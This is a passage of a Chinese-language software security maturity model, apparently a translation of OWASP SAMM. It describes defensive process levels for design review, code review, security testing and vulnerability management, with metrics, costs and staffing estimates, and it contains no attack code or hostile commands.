✦整个组织都期望在 开发过程中针对安全 做出更积极的努力; ✦根据业务需要,利益 相关者可以为安全设 计做出更好的权衡决 定。 额外成功指标 ✦>50%的项目使用了 参考平台; ✦>80%的项目在过去 6个月里报告了框架、 模式和平台的使用反 馈信息; ✦对于项目组报告指 南和平台有用性>3.0 Likert值。 额外成本 ✦建立或者许可参考 平台; ✦对参考平台正在进 行的维护和支持; ✦在审计过程中验证 使用的项目开支。 额外人员 ✦经理(1天/年) ✦业务拥有者(1天/ 年) ✦架构师(3-4天/年) ✦开发人员(2-3天/ 年) ✦安全审计员(2天/ 年) 相关等级 ✦政策与遵守-2 ✦设计审核-3 ✦代码审核-3 ✦安全测试-3 58 设计审核 DR1 DR2 DR3 目标 为软件设计提供 专门的审核,以确 保排除已知风险 的最低线。 根据安全的最佳 实践为软件设计 审核提供评估服 务。 需求评估并验证 已完成部分,以详 细了解保护机制。 措施 A. 确定软件攻击 层面; B. 根据已知安全 需求分析设 计。 A. 检查提供安全 机制的完整 性; B. 为项目团队部 署设计审核服 务。 A. 为敏感资源开 发数据流图; B. 为设计审核建 立发布关卡。 评估 ✦项目团队是否 记录软件设计的 攻击范围? ✦项目团队是否 按照已知的安全 风险检查软件设 计? ✦大多数项目团 队是否为安全机 制具体分析设计 元素? ✦大多数项目业 务拥有者是否知 道如何获得一个 正式的设计审 核? ✦设计审核过程 中是否包括详细 的数据级分析? ✦常规项目审计 是否需要一个设 计审核结果的最 低线? 结果 ✦非常了解架构 的隐含安全影响; ✦实现开发团队 对于安全最佳实 践而进行设计自 检; ✦执行项目级设 计审核的简便处 理。 ✦正式提供评估 服务,以持续审核 架构的安全; ✦在维护模式和 原有系统中准确 找到安全漏洞; ✦项目利益相关 者对于软件如何 提供保护保证有 深入的了解。 ✦系统设计过程 中弱点的细化粒 度,以鼓励更好的 区分; ✦整个组织都注 意到项目的架构 应符合基本安全 期望; ✦在已知缺陷减 少方面,对各项目 的效率和进展进 行比较。 59 设计审核 DR1 为软件设计提供专门的审核,以确保排除已知风险的最低线 措施 A. 确定软件攻击层面 为每个软件项目建立一个整体架构的简化视图。通常 情况下,应该基于项目对象,比如:高层次的需求和设计 文档、与技术人员面谈或基于代码模块级的审查。捕获系 统中的高层次模块非常重要,一个良好的细化略缩图规则 可确保整个系统的审核图在一页上就能显示。 根据每个单页的视图架构,分析每个组件的界面对于 授权用户、匿名用户、操作人员和应用程序特定角色等的 可访问性。根据单页视图的上下文,应考虑提供界面的组 件,以在图表上查找功能委派或传递到其他组件的数据。 将具有类似可访问性文档的界面和组件进行分组,以获得 作为软件的攻击层面。 对于每一个界面,进一步阐述单页视图,以记录任何 与安全相关的功能。根据已确定界面组组成的攻击面,检 查模型设计的一致性,以及如何保护具有类似访问权限的 界面。任何违反一致性的信息都会记录在评估结果中。 这一分析应由项目组内部或外部通晓安全问题的技术 人员执行。通常情况下,在初始建立完成后,当在设计阶 段对边缘系统界面进行添加或者更改时,只需在图表和攻 击层面更新即可。 B. 根据已知安全需求分析设计 无论是已正式还是非正式确认的安全需求,都应确定 并得到收集。另外,确定并包含系统安全操作所依靠的任 何安全假设。 根据系统架构的单页图表,审核已知安全要求列表上 的每一项。阐述该图表,显示针对每条安全需求的设计级 功能。如果系统较大或比较复杂时,则可创建独立的细分 图表,以简化捕获此信息的操作。总体目标是由系统设计 解决验证每一条已知的安全需求。任何未在设计级明确提 供的安全需求都应作为评估结果被记录。 这一分析应由通晓安全问题的技术人员执行,同时还 需架构师、开发人员、管理人员和组织拥有者的介入。当 安全需求或高级系统设计有所更改时,应在设计阶段对其 进行更新。 结果 ✦非常了解架构的隐 含安全影响; ✦实现开发团队对于 安全最佳实践而进行 设计自检; ✦执行项目级设计审 核的简便处理。 成功衡量标准 ✦>50%的项目在过去 12个月里更新了攻击 层面分析; ✦>50%的项目在过去 12个月里更新了安全 需求设计级分析。 成本 ✦扩充并维护每个项 目的架构图; ✦攻击层面和安全需 求设计调查的持续项 目开销。 人员 ✦架构师(2-3天/年) ✦开发人员(1-2天/ 年) ✦经理(1天/年) ✦安全审计员(1天/ 年) 相关等级 ✦安全需求-1 60 设计审核 DR2 根据安全的最佳实践为软件设计审核提供评估服务 措施 A. 检查提供安全机制的完整性 对于高层次体系结构图中模块的每个界面,通过安全 机制列表和系统分析,提供正式的迭代。这种类型的分析 应该在内部界面(例如:层之间)和外部界面(例如:组 成攻击层面的界面)上进行。 需要考虑的六个主要安全机制包括:身份认证、授权、 输入验证、输出编码、错误处理和日志记录。在相关的地 方,还需考虑加密和会话管理机制。对于每一个界面,确 定在系统设计中是否提供了每种机制,并记录遗漏或者不 明确的功能。 这一分析应由通晓安全问题的技术人员执行,并由项 目团队提供具体特定应用的知识。这种分析应在每次发行 时进行,通常是在设计阶段临近结束的时候。经初步分析 后,后续版本都需在开发周期修改的基础上更新结果。 B. 为项目团队部署设计审核服务 制定一个处理流程,以便项目的利益相关者可以要求 进行设计审核。这项服务可在组织内部集中提供,或由目 前的工作人员分布式提供。但所有的审核人员必须针对执 行审核的完整性和一致性进行培训。 审核服务应在审核请求队列中被集中管理,以由熟悉 组织的整体业务风险概况的高级管理人员、架构师和利益 相关者分类筛选。这使得项目审核的优先级与整体业务风 险相对应。 在一个设计审核中,审核团队应与项目团队合作,以 收集足够的信息去系统地阐述对攻击层面的理解、项目特 定的安全需求与设计元素的匹配,并验证模块界面的安全 机制。 结果 ✦正式提供评估服务, 以持续审核架构的安 全; ✦在维护模式和原有 系统中准确找到安全 漏洞; ✦项目利益相关者对 于软件如何提供保护 保证有深入的了解。 额外成功指标 ✦>80%的利益相关者 在过去6个月里大概了 解了审核请求的状态; ✦>75%的项目在过去 12个月里进行了设计 审核。 额外成本 ✦扩充、培训并维护设 计审核团队; ✦项目审核活动的持 续开销。 额外人员 ✦架构师(1-2天/年) ✦开发人员(1天/年) ✦经理(1天/年) ✦安全审计员(2-3 天/年) 相关等级 ✦教育与指导-2 ✦策略与指标-2 61 设计审核 DR3 需求评估并验证已完成部分,以详细了解保护机制 措施 A. 为敏感资源开发数据流图 根据软件项目的业务功能,进行分析,以识别关于高 风险功能的系统行为的详细信息。通常情况下,高风险的 功能将关联到进行创建、获取、更新和删除敏感数据。除 了数据,高风险功能还包括拒绝服务或危害项目特定的关 键业务逻辑。 对于每个已确定的数据源或业务功能,选择并使用标 准化的符号来获取相关的软件模块、数据源、角色以及它 们之间的信息流。通常,从高级别的设计图开始,并不断 充实相关细节信息,同时删除与敏感资源不对应的元素部 分。 当项目数据流图创建以后,对其进行分析并决定设计 过程中的内部堵塞点。一般来说,这些点都将是能处理不 同敏感等级数据的独立软件模块,或是不同业务功能关键 性级别的访问关卡。 B. 为设计审核建立发布关卡 建立一致的设计审核计划以后,下一步骤就是在软件 开发生命周期中设置一个特定点。在执行设计审核,且审 核结果被审核并接受以前,项目无法通过这个特定点。为 通过该点,应设置期望的基准水平,例如:不允许任何具 有高危险性调查结果的项目通过,并且所有的结果必须被 业务拥有者所接受。 一般来说,设计审核应发生在设计阶段快结束的时候, 以协助及早发现安全问题。但它必须在项目团队生成发布 以前执行。 对于旧系统或暂未活动的项目,应建立例外处理流程, 以允许项目的持续操作,但需要有一个明确的审核时间计 划安排,以阐明现有系统中存在的任何隐藏漏洞。例外应 限制于不超过所有项目的20%。 结果 ✦系统设计过程中弱 点的细化粒度,以鼓励 更好的区分; ✦整个组织都注意到 项目的架构应符合基 本安全期望; ✦在已知缺陷减少方 面,对各项目的效率和 进展进行比较。 额外成功指标 ✦>80%的项目在过去 的6个月里更新了数据 流图; ✦>75%的项目在过去 6个月里通过了设计审 核审计。 额外成本 ✦维护正在进行项目 的数据流图的开销; ✦由于设计审核审计 失败,而导致的组织项 目延迟开支。 额外人员 ✦开发人员(2天/年) ✦架构师(1天/年) ✦经理(1-2天/年) ✦业务拥有者(1-2天/ 年) ✦安全审计人员(2-3 天/年) 相关等级 ✦安全架构-3 ✦代码审核-3 62 代码审核 CR1 CR2 CR3 目标 随机查找基本的 代码级漏洞和其 他高风险安全问 题。 通过自动化方式 在开发过程中使 代码审核更加准 确和有效。 必须进行全面的 代码审核过程,以 发现语言级别和 特定应用程序的 风险。 措施 A. 根据已知安全 需求建立审核 检查列表; B. 为高风险代码 执行定点审 核。 A. 使用自动化的 代码分析工 具; B. 将代码分析集 成到开发流程 当中。 A. 为特定应用程 序问题自定义 代码分析; B. 为代码审核建 立发布关卡。 评估 ✦大多数的项目 团队是否拥有基 于普遍问题的审 核清单列表? ✦项目团队是否 通常针对选择的 高风险代码执行 审核? ✦大多数项目团 队是否可以使用 自动的代码分析 工具去查找安全 问题? ✦大多数项目业 务拥有者是否持 续要求并审核来 自代码审核的结 果? ✦项目团队是否 根据应用程序特 定的编码标准,使 用自动化的方式 去检查代码? ✦常规项目审核 是否需要一个为 发布代码审核结 果的最低线? 结果 ✦检验普通代码 中可能被发现或 导致攻击的漏洞; ✦为导致严重安 全影响的编码错 误而进行的简便 审核; ✦为安全保证的 基础代码级审慎 调查。 ✦开发过程实现 了代码级安全漏 洞的持续自我检 查; ✦将常规分析的 结果,以对每个团 队安全编码习惯 的历史数据进行 编译; ✦利益相关者注 意到没有缓和的 漏洞,从而做出更 好的权衡分析。 ✦增加对代码分 析的准确性和适 用性的信心结果; ✦整个组织对安 全编码期望的基 线; ✦项目团队为判 断代码级安全设 立了目标。 63 代码审核 CR1 随机查找基本的代码级漏洞和其他高风险安全问题 措施 A. 根据已知安全需求建立审核检查列表 根据项目已知的安全需求,推导出针对安全性的简便 代码检查列表。这些检查可以具体到围绕功能需求的安全 问题的检测,或针对基于执行语言、平台、代表性技术堆 栈等的安全编码最佳实践的检测。由于这些变化,往往需 要一套检查列表以覆盖在组织内部不同类型的软件开发。 不论是用公开可用的资源进行创建或者购买,技术利 益相关者,比如:开发经理、架构师、开发人员和安全审 计员,应审核清单列表的有效性和可行性。重要的是要保 持列表简短并且简单,以通过对于代码的人工或者简单搜 索工具查找高优先级问题。自动化代码分析工具也可以用 来实现同一目标,但为了使扫描和审核过程更加有效,也 应该对分析工具进行定制,以将总体安全检查的整体集合 缩小为一个有价值的小集合。 开发人员应为他们的工作职能大概了解列表清单的目 标。 B. 为高风险代码执行定点审核 由于代码级的漏洞在关系到软件安全性的关键部分发 生,会带来明显的影响,项目团队应针对常见漏洞进行高 风险模块的审核。高风险的功能的常见例子包括:身份验 证模块、访问控制增强点、会话管理模块、外部界面、输 入校验器和数据解析器等。 利用代码审核检查列表,该分析可作为开发流程的一 个普通部分执行,但进行更改时,项目团队成员会被分配 给要审核的模块。安全审计员和自动审核工具也可以被用 于进行审核处理。 在更改和审核高风险代码的开发周期中,开发经理应 当在其他项目利益相关者的介入下,将找到的结果进行分 类,并适当的将修复工作进行优先级排序。 结果 ✦检验普通代码中可 能被发现或导致攻击 的漏洞; ✦为导致严重安全影 响的编码错误而进行 的简便审核; ✦为安全保证的基础 代码级审慎调查。 成功指标 ✦>80%的项目在过去 6个月里大概了解了相 关代码审核检查表; ✦>50%的项目在过去 6个月里对高风险代码 执行了代码审核; ✦开发团队代码审核 列表的有用性值,大于 3.0 Likert值。 成本 ✦扩充或者许可代码 审核检查列表; ✦高风险代码审核活 动的项目持续开销。 人员 ✦开发人员(2-4天/ 年) ✦架构师(1-2天/年) ✦经理(1-2天/年) ✦业务拥有者(1天/ 年) 相关等级 ✦安全需求-1 64 代码审核 CR2 通过自动化方式在开发过程中使代码审核更加准确和有效 措施 A. 使用自动化的代码分析工具 很多代码级的安全漏洞因复杂而非常难以理解,往往 需要仔细检查才能被发现。但是,有很多有用的自动化解 决方案,可针对bug和漏洞进行自动得代码分析。 有商业的和开源的产品覆盖了常见的编程语言和框 架。对于选择一个适当的代码分析解决方案,需要根据以 下一些要素,包括:检查的深度和准确性、产品的可用性 和使用模型、可扩展性和自定义功能、组织架构和技术堆 栈的适用性等。 在选择过程中,由通晓安全知识的技术人员以及开发 人员和开发管理人员介入,并与利益相关者一起审核总体 结果。 B. 将代码分析集成到开发流程当中 一旦选中代码分析解决方案后,它必须被纳入到开发 过程中,以鼓励项目团队利用它的功能。要做到这一点的 一个有效方法是设置基础架构,在代码开发时直接进行自 动扫描;或是从项目代码库获取代码进行自动扫描。这样, 可以及早获得结果,从而使开发团队能够在发布以前进行 自我检查。 在旧系统或正在进行的大型项目中,一个潜在的问题 是,代码扫描器通常会报告发布以前尚未更新模块的结果。 如果自动扫描设置为定期运行,避免审核开销的有效策略 是:考虑限制那些已被添加、删除、或自上次扫描后发生 的改变。如果不能忽略剩下的结果,那么开发经理应当与 安全审计员、利益相关者和项目团队合作,制订一个针对 其他结果的解决计划。 如果在发布以前仍然存在代码审核未能解决的结果, 那么项目利益相关者必须审核并接受这些结果。 结果 ✦开发过程实现了代 码级安全漏洞的持续 自我检查; ✦将常规分析的结果, 以对每个团队安全编 码习惯的历史数据进 行编译; ✦利益相关者注意到 没有缓和的漏洞,从而 做出更好的权衡分析。 额外成功指标 ✦>50%的项目在过去 6个月里进行了代码审 核并由利益相关者认 可; ✦>80%的项目在过去 1个月里查看了自动代 码审核的结果。 额外成本 ✦代码分析解决计划 的研究和选择; ✦自动化整合的初步 花销和维护; ✦自动化代码审核和 降低风险的项目持续 开销。 额外人员 ✦开发人员(1-2天/ 年) ✦架构师(1天/年) ✦经理(1-2天/年) ✦安全审计员(3-4 天/年) 相关等级 ✦无 65 代码审核 CR3 必须进行全面的代码审核过程,以发现语言级别和特定应用程序的风险 措施 A. 为特定应用程序问题自定义代码分析 代码扫描工具采用了基于知识的内置检测规则,在常 用语言的API和库的基础上检查代码。但是,这类工具对 于理解自定义API和适用于类似检查的设计能力有限。然 而,通过自定义,代码扫描器可成为一个功能强大且通用 的分析引擎,以寻找组织和具体项目的安全问题。 就简单性和自定义分析的能力而言,虽然不同工具的 细节有所不同,但是自定义代码扫描器通常涉及到在特定 的API和对函数调用地方进行指定检查。检查可以包括: 分析内部编码标准的遵守、被传递给自定义界面的未检测 感染数据、对敏感数据处理的跟踪和验证、内部API的正 确使用等。 从使用共享代码库的检查器自定义扫描器是非常有效 的,因为已创建的检查器可在多个项目中使用。要为代码 库自定义工具,安全审计员应检查代码和高层次的设计, 以确定可用的检测器,并与开发人员和利益相关者讨论相 关的执行。 B. 为代码审核建立发布关卡 为了给所有的软件项目设立代码级的安全底线,应在 软件开发生命周期中建立一个特殊的点作为检查点,以满 足达到发布的代码审核最低标准。 首先,这个标准应该比较直接,例如,选择一个或两 个漏洞类型来设定标准,而具有相应结果的项目不能通过。 随着时间的推移,应通过添加额外的通过检查点的标准而 改进。 一般来说,代码审核检查点应发生在执行阶段快结束 以前,并必须在发布前执行。 对于旧系统或暂未活动的项目,应建立例外处理流程, 以允许项目的持续操作,但需要有一个明确的审核时间计 划安排以抑制结果。例外应限制于不超过所有项目的20%。 结果 ✦增加对代码分析的 准确性和适用性的信 心结果; ✦整个组织对安全编 码期望的基线; ✦项目团队为判断代 码级安全设立了目标。 额外成功指标 ✦>50%的项目使用了 代码分析自定义; ✦>75%的项目在过去 6个月里通过了代码审 核审计。 额外成本 ✦扩充和维护自定义 代码审核检查; ✦代码审核审计的持 续项目开销; ✦由未通过代码审核 审计,而导致项目延迟 的企业组织开支。 额外人员 ✦架构师(1天/年) ✦开发人员(1天/年) ✦安全审计员(1-2 天/年) ✦业务拥有者(1天/ 年) ✦经理(1天/年) 相关等级 ✦政策与遵守-2 ✦安全架构-3 66 安全测试 ST1 ST2 ST3 目标 根据编程和软件 需求,建立处理过 程以执行基本的 安全测试。 通过自动化使在 开发过程中的安 全测试更加完善 和有效。 在部署前要求进 行特定应用程序 的安全测试以确 保基本的安全。 措施 A. 从已知安全需 求推出测试用 例; B. 为软件发布执 行渗透测试。 A. 使用自动化的 安全测试工 具; B. 将安全测试整 合到开发过程 中。 A. 为特定应用程 序使用自动化 的安全测试; B. 为安全测试建 立发布关卡。 评估 ✦项目是否明确 指定一些基于需 求的安全测试? ✦大多数项目是 否在发布以前执 行渗透测试? ✦大多数利益相 关者是否意识到 需在发布以前进 行安全测试? ✦项目是否使用 了自动化工具去 评估安全测试用 例? ✦大多数项目是 否遵守一个一致 的过程,为利益相 关者评估并记录 安全测试? ✦安全测试用例 是否为应用程序 特定的逻辑而综 合制作的? ✦常规项目审核 是否需要来自于 安全测试的最低 标准结果? 结果 ✦独立验证围绕 关键业务功能的 预期安全机制; ✦为达到安全性 测试的高级别审 慎调查; ✦对于每个软件 项目安全测试的 特定完善。 ✦更加深入以及 更加连贯地验证 软件的安全功能; ✦在发布以前开 发团队实现自我 检查和错误更正; ✦利益相关者在 做出风险认同决 定时,能更好的意 识到开放的威胁 漏洞。 ✦应用程序对于 抵抗预期攻击的 表现的组织整体 基准线; ✦为提高自动化 分析准确性的自 定义安全测试组 件; ✦项目团队意识 到了攻击抵抗的 目的。 67 安全测试 ST1 根据软件编码和软件需求建立为执行基本安全测试的过程 措施 A. 从已知的安全需求中得到测试实例 根据一个项目的已知安全要求,确定一组测试用例, 以检查软件功能是否正确。通常,这些测试用例从围绕功 能要求和系统业务逻辑的安全问题中获得,但还应包括针 对基于编程语言或技术堆栈的常见威胁漏洞的通用测试。 通常,最有效的方法是由项目团队来建立应用程序特 定的测试用例,并采用可用的资源或者以购买的知识库, 为安全性选择可用的常见测试用例。虽然不是必需的,也 可以使用自动化安全测试工具覆盖常见的安全测试用例。 这个测试用例计划应该执行在需求分析和设计阶段, 且必须在发布以前的最终测试之前执行。选用的测试用例 应由相关的开发人员、安全人员和QA人员针对其适用性、 有效性、可行性进行审核。 B. 为软件发布引导进行渗透测试 使用为每个项目选定的安全测试用例进行渗透测试, 以评估该系统对于每个用例的表现。这种测试在测试阶段 应经常被执行。 渗透测试用例应包括应用程序特定的测试,以检查业 务逻辑的完整性;以及一般威胁漏洞测试,以检查设计和 程序代码。一旦指定,安全测试用例可以由具有安全常识 的质量保证或开发人员执行。但项目小组第一次使用安全 测试用例时,应当在安全审计员的监控下进行,以协助并 指导团队成员。 在发布或部署之前,利益相关者必须审核安全测试的 结果,并在发布时期接受由未通过的安全测试检测显示出 的风险。在后一种情况下,一个具体的时间表应当被建立, 以弥补相关的漏洞缺陷。 结果 ✦独立验证围绕关键 业务功能的预期安全 机制; ✦为达到安全性测试 的高级别审慎调查; ✦对于每个软件项目 安全测试的特定完善。 成功指标 ✦>50%的项目在过去 的12个月里指定了安 全测试实例; ✦>50%的利益相关者 在过去6个月里大概了 解了项目安全测试的 状态。 成本 ✦扩充或许可安全测 试实例; ✦维护和评估安全测 试实例的项目持续开 销。 人员 ✦QA测试员(1-2天/ 年) ✦安全审计员(1-2 天/年) ✦开发人员(1天/年) ✦架构师(1天/年) ✦业务拥有者(1天/ 年) 相关等级 ✦安全需求-1 68 安全测试 ST2 通过自动化使开发过程中的安全测试更加完善和有效 措施 A. 使用自动化的安全测试工具 为了测试安全性,需要对每个软件界面进行大量输入 用例的检测,但这样会使安全用例的有效手动测试实施和 执行难以控制。因此,应该使用自动化安全测试工具自动 测试软件,以使安全测试更加有效,并获得更高质量的结 果。 针对组织的适用性,审核商业的和开源的产品。选择 一个合适工具,应基于以下一些因素,其中包括:内置安 全测试用例的健康性和准确性;对组织重要的测试架构种 类的有效性;改变或添加测试用例的自定义;开发组织结 果的质量和可用性等。 在选择过程中,由具有安全知识的技术人员和开发人 员、质量保证人员参与介入,并和利益相关者一起审核全 部结果。 B. 将安全测试整合到开发过程中 通过使用自动化工具进行安全测试,组织内的项目在 开发过程中应当经常执行安全测试并审核结果。为了保持 低开销,安全测试工具应该在经常执行的基础上被配置为 自动运行,例如:每晚或每周,并检查获得的结果。 只要对需求或者设计有利,就应尽早执行安全测试。 虽然在传统意义上,使用了功能性测试用例。但这种测试 驱动的开发方法,包含了在开发生命周期的早期阶段(通 常是设计阶段),识别并运行安全测试用例。随着安全测 试用例自动化的执行,项目在一些针对并不存在的功能而 没有通过测试的情况下,进入了编码执行阶段。当所有的 测试通过以后,编码执行完成。这在开发生命周期中为开 发人员提供了一个清晰的早期目标,从而降低了对于安全 考虑而延迟发布的风险,或为赶上项目的最后期限而被迫 接受安全漏洞的风险。 对于每个项目的发布,通过自动和手动安全检测方式 获得的结果,应当由管理人员和业务利益相关者进行审核。 如果在发布内容中仍然有未解决的风险,利益相关者和开 发管理人员应共同努力,建立解决这些问题的具体时间表。 结果 ✦更加深入以及更加 连贯地验证软件的安 全功能; ✦在发布以前开发团 队实现自我检查和错 误更正; ✦利益相关者在做出 风险认同决定时,能更 好的意识到开放的威 胁漏洞。 额外成功指标 ✦>50%的项目在过去 的6个月里执行了安全 测试并由利益相关者 认可; ✦>80%的项目在过去 1个月里查看了自动化 安全测试的结果。 额外成本 ✦自动化安全测试方 案的研究和选择; ✦自动化整合的初始 开支和维护; ✦正在进行的项目执 行自动化安全测试和 抑制的项目持续开销。 额外人员 ✦开发人员(1天/年) ✦架构师(1天/年) ✦经理(1-2天/年) ✦安全审计员(2天/ 年) ✦QA测试员(3-4天/ 年) 相关等级 ✦ 69 安全测试 ST3 要求应用程序特定的安全测试以在部署以前确保安全的基准线 措施 A. 为特定应用程序使用自动化的安全测试 通过自定义安全测试工具、增强通用测试用例执行工 具或者通过扩充自定义用户测试工具,项目小组通过安全 要求建立一组自动的检查器,开始正式迭代工作以测试所 执行业务逻辑的安全。 另外,如果对自动安全测试工具进行自定义,以使它 们能够理解关于正在进行测试的项目中的特定软件界面的 更多信息,就可以明显改善测试的精度和覆盖深度。还有, 可将特定于组织的规范或技术标准的特定问题,整理为一 个可重复使用、集中的测试系列,以使能够更容易地查看 审计数据集合和每个项目的管理情况。 项目小组应在他们的软件业务功能基础上,着重于安 全测试用例的建立;另外,一个由安全审计员领导的组织 级别团队,应着重于详细阐述对符合规定和内部标准的自 动化测试。 B. 为安全测试建立发布关卡 为了避免在即将发布的软件中存在极易被发现的安全 bug,应在软件开发生命周期中设立一个的特定检测点, 已建立的安全测试用例必须通过该点才能发布项目。这就 建立了一个所有项目都应该通过的各种安全测试的基准。 由于在初期添加太多的测试用例可能会导致一个间接 成本增加,因此,在开始时选择一到两个安全问题,包括 对每种问题的各种测试用例,并以项目必须通过所有的测 试为期望。随着时间的推移,这个基准应随着额外安全问 题的选择以及添加各种相应测试用例而被改善。 总的来说,这个安全测试检测点应在编程阶段快结束 时或是测试阶段执行,且必须在发布以前。 对于旧系统或暂未活动的项目,应建立例外处理流程, 以允许项目的持续操作,但需要有一个明确的审核时间计 划安排以抑制结果。例外应限制于不超过所有项目的20%。 结果 ✦应用程序对于抵抗 预期攻击的表现的组 织整体基准线; ✦为提高自动化分析 准确性的自定义安全 测试组件; ✦项目团队意识到了 攻击抵抗的目的。 额外成功指标 ✦>50%的项目正在使 用自定义的安全测试; ✦>75%的项目在过去 6个月里通过了所有的 安全测试。 额外成本 ✦为自动化安全测试 而扩充和维护自定义; ✦安全测试审计过程 的项目持续开支; ✦由于安全测试审计 失败而导致项目延迟 的组织开支。 额外人员 ✦架构师(1天/年) ✦开发人员(1天/年) ✦安全审计员(2天/ 年) ✦QA测试员(1-2天/ 年) ✦业务拥有者(1天、 年) ✦经理(1天/年) 相关等级 ✦政策于遵守-2 ✦安全架构-3 70 漏洞管理 VM1 VM2 VM3 目标 理解对于漏洞报 告或事件的高级 别计划。 为响应过程阐述 期望,以改善一致 性和交流。 在响应过程中为 积极规划提供反 馈,而改善分析和 数据收集。 措施 A. 为安全事件确 定联络点; B. 建立非正式安 全响应团队。 A. 建立一致的事 件响应流程; B. 采用安全事件 报告流程。 A. 为事件执行根 源分析; B. 收集每一事件 的度量指标。 评估 ✦大多数项目是 否都有对于安全 问题的联络点? ✦组织是否已设 立一个安全响应 团队? ✦大多数项目团 队是否知道他们 的安全联络点和 响应团队? ✦组织对于事件 的报告和处理是 否使用了一种一 致的流程? ✦大多数利益相 关者是否意识到 公开的相关安全 事件与他们的软 件项目有关系? ✦大多数调查了 根本起因的安全 事件是否有了更 多更深入的建 议? ✦大多数项目是 否持续收集并报 告关于安全事件 的数据和衡量标 准? 结果 ✦处理高优先级 漏洞或事件的简 便处理过程就为; ✦供利益相关者 通知和报告影响 安全的事件的框 架; ✦处理安全事件 的高级审慎调查。 ✦处理第三方漏 洞报告的沟通计 划; ✦为软件操作员 发布安全补丁的 清晰流程; ✦关于事件跟踪、 处理和内部沟通 的正式流程。 ✦每个事件后针 对组织改进的详 细反馈; ✦对由漏洞和损 坏带来成本损失 的粗略估计; ✦利益相关方能 够更好地根据历 史事件趋势做出 权衡的决策。 71 漏洞管理 VM1 理解对于漏洞报告或事件的高级别计划 措施 A. 为安全事件确定联络点 为组织中的每一个部门或每个项目团队建立一个联络 点,以作为安全信息的交流中心。虽然通常此职责不会占 用个人很多时间,但预先设定联络点的目的是为漏洞管理 增加结构和监管。 由安全事件造成的使用示例包括:接收来自外部实体 的漏洞报告、现场发生的软件损坏或其他软件的安全故障、 内部发现的高风险漏洞等。如果发生安全事件,则最近的 联络点将作为受影响项目团队的额外资源以及顾问,提供 技术指导,并为其他利益相关方介绍抑制措施的进展。 联络点应该从通晓安全问题的技术人员或管理人员中 选取,他们必须对组织中的软件项目有较广的知识。这些 分配的安全联络点的名单列表应集中维护,并至少每六个 月更新一次。此外,发布和公布此列表使组织中的成员能 够就安全问题更直接地向其他成员请求帮助并进行合作。 B. 建立非正式安全响应团队 从分配有安全联络点职责的个人列表中,或从专门的 安全工作人员中,选出一小组人,以作为一个集中式的安 全响应技术团队。该团队的职责包括直接负责安全事件或 漏洞报告,并负责分类、抑制和向利益相关方报告。 除具有上述职责外,安全响应团队的成员还需要负责 在事件发生期间执行行政报告并与上级沟通。在大多数情 况下,安全响应团队可能不会执行这些职责,但是他们必 须具有足够的灵活性以能够快速响应,或必须与其他团队 组员一起流畅地处理安全事件。 响应团队应每年至少举行一次会议,以简要介绍响应 处理流程的安全联络点,以及项目团队对安全相关报告的 高级预期。 结果 ✦处理高优先级漏洞 或事件的简便处理过 程就为; ✦供利益相关者通知 和报告影响安全的事 件的框架; ✦处理安全事件的高 级审慎调查。 成功指标 ✦>50%的组织在过去6 个月中了解了最近的 安全联络点; ✦在过去12个月中,安 全响应团队和联络点 举行了至少一次会议。 成本 ✦项目中由人员担任 安全联络点角色而造 成的持续开销; ✦确定恰当的安全响 应团队。 人员 ✦安全审计员(1 天/ 年) ✦架构师(1 天/年) ✦经理(1 天/年) ✦企业所有者(1 天/ 年) 相关等级 ✦教育与指导-2 ✦策略与指标-3 72 漏洞管理 VM2 为响应过程阐述期望,以改善一致性和交流 措施 A. 建立一致的事件响应流程 从非正式安全响应小组扩展开来,清楚地记录组织的 事件响应流程以及团队成员可望遵循的处理过程。此外, 每个安全响应团队的成员必须每年进行至少一次针对这些 材料的培训。 合理的事件响应流程需具有几条原则,它们包括:初 始分类以避免额外的损失、更改管理和补丁应用程序、管 理项目人员以及与事件相关的其他人员、证据收集和保存、 限制将该事件透露给利益相关者、明确的向利益相关者报 告机制和通信树等。 安全响应人员应与开发团队合作,执行技术分析以验 证关于每个事件或漏洞报告的事实和假设。同样,当项目 团队检测到安全事件或高风险漏洞时,他们应遵循一个内 部流程,从而与安全响应小组的成员取得联系。 B. 采用安全事件报告流程 对于大多数组织而言,它们不愿意公布关于安全问题 的消息,但这里有一些应遵循的重要方法,以将安全问题从 内部沟通到外部。 第一个,也是最常见的一个方法,是组织通过为其开 发的软件创建和部署安全补丁。通常情况下,如果所有软 件项目只是内部使用,则这种方法不那么重要;但是对于 在组织以外操作该软件的所有环境而言,必须存在补丁发 布流程。它应该提供多个因素,包括:发布补丁前的变更 管理和回归测试、通知操作员/用户为补丁分配关键性类 别、分散详细的技术信息从而使攻击者无法直接加以利用, 等等。 另一个方法是与第三方进行外部沟通,以报告组织软 件中的安全漏洞。通过采用和对外发布具有相应期限的预 期流程,鼓励漏洞报告人员遵循负责的信息公开步骤实践。 最后,许多国家/地区的法律规定要求组织公布涉及个 人身份信息和其他类型敏感数据的数据盗窃事件。如果发 生了这种事件,安全响应团队应与管理人员以及组织利益 相关者合作,确定下一步适当的操作。 结果 ✦处理第三方漏洞报 告的沟通计划; ✦为软件操作员发布 安全补丁的清晰流程; ✦关于事件跟踪、处理 和内部沟通的正式流 程。 额外成功指标 ✦>80%的项目组在过 去六个月中大概了解 了事件响应流程; ✦>80%的利益相关者 在过去6个月中大概了 解了安全问题的公开 情况。 额外成本 ✦当前组织对于安全 事件响应流程的开销。 额外人员 ✦安全审计员(3-5天/ 年) ✦经理(1-2天/年) ✦业务拥有者(1-2天/ 年) ✦支持/操作人员(1 -2天/年) 相关等级 ✦ 73 漏洞管理 VM3 在响应过程中为积极规划提供反馈,而改善分析和数据收集 措施 A. 为事件执行根源分析 虽然可能会花费大量时间,但应当将安全事件响应处 理流程扩大以进行额外的分析,从而确定导致安全故障的 关键。这些根源可能是技术问题(例如:代码级漏洞、配 置错误等),也可能是人员/流程问题(例如:社会工程学、 未能遵循程序等)。 一旦确定事件根源后,应将其作为工具使用,以在组 织中查找可能发生类似事件的其他潜在缺陷。对于每一个 已确认的缺陷,还应该给出其他预先主动抑制发生的建议, 以作为结束原始事件响应工作的一部分。 所有根据造成事件的根本原因分析所得出的建议,应 由管理层和相关利益相关者审查,以安排相应的牵制工作 或记录所能接受的风险。 B. 收集每一事件的度量指标 通过采用集中处理流程处理所有损坏和高优先级漏洞 报告,组织能够逐渐采纳趋势措施,以确定针对安全保证 所提出的影响和效率。 应记录并审核过去至少每6个月中的安全事件信息。对 相似的事件进行分组,并简单统计每种类型事件的总数。 对于事件采取的额外措施还因包括:软件项目受事件影响 的频率、因无法使用而导致的系统停机和成本、处理和清 除安全事件占用的人力资源、估算的长期成本(如管理费 